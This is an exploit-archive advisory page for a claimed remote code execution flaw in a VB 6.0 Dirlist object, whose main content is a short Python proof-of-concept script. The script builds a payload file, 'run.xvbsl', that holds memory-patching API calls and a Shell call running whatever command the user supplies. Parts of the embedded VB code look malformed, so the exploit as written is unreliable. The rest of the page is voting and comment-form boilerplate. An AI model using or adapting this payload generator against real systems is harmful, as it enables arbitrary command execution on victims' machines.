VB 6.0 Dirlist Object - Code Execution

2020.04.23

HexraiN (TR)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#/
#* VB 6.0 Dirlist Object Code Execution
#* Author  : Hexrain
#* Tutorial Video : https://youtu.be/BLFbUJ4n8hY
#* Twitter : @smashedkernel
#* Greetz : OA Cybersec ~ wornix ~ blacknbunny
#/
    
import sys

try:
    commandfile = sys.argv[1]
    poc = 'End If\nEnd Sub\nlPtr = Private Type Private Type\nRtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1\nRtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4\nRtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1\nCallAPI = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)\nbvASM(Shell "{0}",vbNormal)\nEnd Function\n'.format(commandfile)
    fo = open("run.xvbsl", "w")
    fo.write( poc)
    fo.close()
    print ("[+] Payload Created Succes..")
except:
    print ("[!] Payload not created..")

See this note in RAW Version

Vote for this issue:

66%

34%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

VB 6.0 Dirlist Object - Code Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.